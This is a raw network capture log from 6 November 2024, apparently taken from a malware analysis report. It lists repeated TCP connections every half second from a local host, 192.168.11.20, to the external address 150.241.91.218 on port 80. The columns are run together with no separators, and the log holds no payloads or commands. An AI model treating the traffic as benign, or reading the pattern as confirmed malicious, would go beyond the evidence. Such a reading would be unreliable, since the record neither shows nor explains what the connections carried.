                                                                                                                                                              Nov 6, 2024 17:37:38.789827108 CET5002280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:38.978904009 CET8050022150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:38.978940964 CET8050022150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.048944950 CET8050022150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.060786009 CET5002280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.061212063 CET5002380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.251420975 CET8050022150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.251430988 CET8050023150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.251635075 CET5002380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.251655102 CET5002280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.251776934 CET5002380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.251776934 CET5002380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.441580057 CET8050023150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.441589117 CET8050023150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.508541107 CET8050023150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.520617962 CET5002380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.521029949 CET5002480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.715400934 CET8050024150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.715449095 CET8050023150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.715646029 CET5002480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.715647936 CET5002380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.715768099 CET5002480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.715768099 CET5002480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.905410051 CET8050024150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.905452013 CET8050024150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.974571943 CET8050024150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:39.989926100 CET5002480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:39.991174936 CET5002580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:40.182482004 CET8050024150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:40.182490110 CET8050025150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:40.182632923 CET5002480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:40.182632923 CET5002580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:40.182785034 CET5002580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:40.182785034 CET5002580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:40.372670889 CET8050025150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:40.372714043 CET8050025150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:40.439685106 CET8050025150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:40.452214003 CET5002580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:40.452663898 CET5002680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:40.642525911 CET8050026150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:40.642569065 CET8050025150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:40.642766953 CET5002580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:40.642780066 CET5002680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:40.643208027 CET5002680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:40.643208027 CET5002680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:40.834316015 CET8050026150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:40.834356070 CET8050026150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:41.197124004 CET8050026150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:41.214467049 CET5002680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:41.215204000 CET5002780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:41.402420044 CET8050026150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:41.402695894 CET5002680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:41.403587103 CET8050027150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:41.403804064 CET5002780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:41.403949976 CET5002780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:41.403949976 CET5002780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:41.592102051 CET8050027150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:41.592143059 CET8050027150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:41.659935951 CET8050027150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:41.672355890 CET5002780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:41.672954082 CET5002880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:41.863081932 CET8050027150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:41.863091946 CET8050028150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:41.863301992 CET5002880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:41.863312006 CET5002780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:41.863466978 CET5002880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:41.863466978 CET5002880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.056827068 CET8050028150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:42.056843996 CET8050028150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:42.127798080 CET8050028150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:42.141122103 CET5002880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.141618013 CET5002980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.333403111 CET8050029150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:42.333419085 CET8050028150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:42.333673000 CET5002980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.333673000 CET5002880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.333935976 CET5002980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.333935976 CET5002980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.523648977 CET8050029150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:42.523663044 CET8050029150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:42.587172985 CET8050029150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:42.608834028 CET5002980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.609456062 CET5003080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.803023100 CET8050029150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:42.803056955 CET8050030150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:42.803263903 CET5002980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.803333998 CET5003080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.803395033 CET5003080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.803395033 CET5003080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:42.992223024 CET8050030150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:42.992264986 CET8050030150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.062571049 CET8050030150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.079814911 CET5003080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.080511093 CET5003180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.274427891 CET8050030150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.274466038 CET8050031150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.274676085 CET5003080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.274676085 CET5003180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.274838924 CET5003180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.275017977 CET5003180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.463344097 CET8050031150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.463385105 CET8050031150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.533123970 CET8050031150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.545074940 CET5003180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.545685053 CET5003280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.734535933 CET8050032150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.734579086 CET8050031150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.734776020 CET5003280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.734791040 CET5003180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.734947920 CET5003280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.734947920 CET5003280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.925353050 CET8050032150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.925415993 CET8050032150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.986654043 CET8050032150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:43.998645067 CET5003280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:43.999186039 CET5003380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.189081907 CET8050033150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:44.189090014 CET8050032150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:44.190114021 CET5003280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.190114021 CET5003380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.190310001 CET5003380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.190310001 CET5003380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.378526926 CET8050033150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:44.378581047 CET8050033150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:44.444710016 CET8050033150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:44.455987930 CET5003380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.456429005 CET5003480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.651685953 CET8050033150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:44.651909113 CET5003380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.652071953 CET8050034150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:44.652331114 CET5003480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.652489901 CET5003480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.652489901 CET5003480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.840596914 CET8050034150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:44.840651989 CET8050034150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:44.910212040 CET8050034150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:44.925400019 CET5003480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:44.926037073 CET5003580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.113262892 CET8050034150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:45.113411903 CET8050035150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:45.113655090 CET5003480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.113825083 CET5003580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.114059925 CET5003580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.114088058 CET5003580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.302109957 CET8050035150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:45.302129030 CET8050035150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:45.366733074 CET8050035150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:45.377948999 CET5003580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.378465891 CET5003680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.566288948 CET8050036150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:45.566473007 CET8050035150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:45.566483974 CET5003680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.566618919 CET5003680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.566618919 CET5003680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.566658974 CET5003580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.754311085 CET8050036150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:45.754324913 CET8050036150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:45.825392962 CET8050036150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:45.840761900 CET5003680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:45.841371059 CET5003780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.033931971 CET8050037150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.033993959 CET8050036150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.034096956 CET5003780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.034161091 CET5003680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.034255028 CET5003780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.034255028 CET5003780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.222037077 CET8050037150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.222131014 CET8050037150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.291073084 CET8050037150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.301506996 CET5003780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.301831961 CET5003880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.491379976 CET8050037150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.491394043 CET8050038150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.491609097 CET5003780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.491609097 CET5003880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.491909027 CET5003880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.491909027 CET5003880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.680742979 CET8050038150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.680795908 CET8050038150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.753082991 CET8050038150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.765064001 CET5003880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.765491009 CET5003980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.956432104 CET8050039150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.956617117 CET5003980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.956763029 CET5003980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.956763029 CET5003980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:46.956808090 CET8050038150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:46.957081079 CET5003880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:47.144726038 CET8050039150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:47.144732952 CET8050039150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:48.483819008 CET8050039150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:48.498847961 CET5003980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:48.499576092 CET5004080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:48.689896107 CET8050039150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:48.689908981 CET8050040150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:48.690085888 CET5003980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:48.690124035 CET5004080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:48.690237999 CET5004080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:48.690237999 CET5004080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:48.881642103 CET8050040150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:48.881654978 CET8050040150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:48.942179918 CET8050040150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:48.961898088 CET5004080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:48.962663889 CET5004180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.151467085 CET8050041150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:49.151684999 CET5004180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.151709080 CET8050040150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:49.151829958 CET5004180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.151829958 CET5004180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.151937008 CET5004080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.339400053 CET8050041150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:49.339452028 CET8050041150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:49.407593966 CET8050041150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:49.423063040 CET5004180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.423532963 CET5004280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.612072945 CET8050041150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:49.612132072 CET8050042150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:49.612245083 CET5004180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.612334967 CET5004280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.612401962 CET5004280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.612401962 CET5004280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.801986933 CET8050042150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:49.802000046 CET8050042150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:49.873044968 CET8050042150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:49.892429113 CET5004280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:49.893136978 CET5004380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:50.080916882 CET8050042150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:50.080954075 CET8050043150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:50.081085920 CET5004280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:50.081085920 CET5004380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:50.081311941 CET5004380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:50.081311941 CET5004380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:50.269448042 CET8050043150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:50.269455910 CET8050043150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:51.348893881 CET8050043150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:51.360985994 CET5004380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:51.361465931 CET5004480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:51.552453041 CET8050043150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:51.552464008 CET8050044150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:51.552633047 CET5004380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:51.552633047 CET5004480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:51.552791119 CET5004480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:51.552791119 CET5004480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:51.741775036 CET8050044150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:51.741786003 CET8050044150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:51.813172102 CET8050044150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:51.824898958 CET5004480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:51.825375080 CET5004580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.013262033 CET8050044150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.013299942 CET8050045150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.013648033 CET5004580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.013648033 CET5004480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.013648033 CET5004580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.013648033 CET5004580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.202658892 CET8050045150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.202672005 CET8050045150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.269903898 CET8050045150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.280591011 CET5004580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.281052113 CET5004680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.468727112 CET8050045150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.468849897 CET8050046150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.468911886 CET5004580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.469080925 CET5004680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.469284058 CET5004680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.469284058 CET5004680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.657283068 CET8050046150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.657337904 CET8050046150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.730328083 CET8050046150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.741799116 CET5004680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.742292881 CET5004780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.930216074 CET8050046150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.930371046 CET5004680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.930385113 CET8050047150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:52.930567026 CET5004780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.930660009 CET5004780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:52.930660009 CET5004780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.118768930 CET8050047150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:53.118824005 CET8050047150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:53.193305016 CET8050047150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:53.218039989 CET5004780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.218662024 CET5004880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.408102036 CET8050047150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:53.408113003 CET8050048150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:53.408312082 CET5004780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.408354998 CET5004880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.408531904 CET5004880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.408531904 CET5004880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.596972942 CET8050048150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:53.596985102 CET8050048150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:53.670475960 CET8050048150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:53.685513020 CET5004880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.686009884 CET5004980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.875690937 CET8050048150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:53.875750065 CET8050049150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:53.875915051 CET5004880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.875974894 CET5004980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.876085997 CET5004980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:53.876085997 CET5004980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.064402103 CET8050049150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:54.064455032 CET8050049150.241.91.218192.168.11.20
